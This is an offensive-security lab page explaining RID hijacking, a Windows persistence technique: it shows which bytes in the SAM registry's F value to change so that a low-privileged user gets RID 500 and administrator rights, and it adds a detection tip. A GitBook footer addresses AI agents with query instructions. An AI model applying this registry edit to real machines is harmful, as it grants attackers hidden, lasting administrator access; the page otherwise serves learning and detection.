> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/persistence/rid-hijacking.md). # RID Hijacking RID (Relative ID, part of the SID (Security Identifier)) hijacking is a persistence technique, where an attacker with SYSTEM level privileges assigns an RID 500 (default Windows administrator account) to some low privileged user, effectively making the low privileged account assume administrator privileges on the next logon. This techniques was originally researched by [Sebastian Castro](https://twitter.com/r4wd3r) - ## Execution This lab assumes that we've compromised the WS01 machine and have `NT SYSTEM` access to it. Below shows that the user `hijacked` is a low privileged user and has an RID of 1006 or 0x3ee: ![](/files/-M0DGJlxfn7mv9ZjMEhU) If we try to write something to c:\windows\ with the user `hijacked`, as expected, we get `Access is Denied`: ![](/files/-M0DGYZgoeE3NSona3oi) HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users\000003EE stores some information about the user`hijacked` that is used by LSASS during the user logon/authentication process. Specifically, at offset `0030` in the value `F` there are bytes that denote user's RID, which in our case are 03ee (1006) for the user `hijacked`: ![](/files/-M0DGeYuTBtkjJYilbhi) We can change those 2 bytes to 0x1f4 (500 - default administrator RID), which will effectively make the user `hijacked` assume administrator privileges: ![](/files/-M0DGtzKXc-5kF_h7ypJ) ## Demo After changing the `hijacked` RID from 3ee to 1f4 and creating a new logon session, we can see that the user `hijacked` is now allowed to write to c:\windows\\, suggesting it now has administrative privileges: ![](/files/-M0DHZBbuYfbn1bcmp53) Note, that the user `hijacked` still does not belong to local administrators group, but its RID is now 500: ![](/files/-M0DHoH1TRurXKs55jPX) ## Detection Monitor HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users\\\*\F for modifications, especially if they originate from unusual binaries. ## References {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://www.ired.team/offensive-security/persistence/rid-hijacking.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.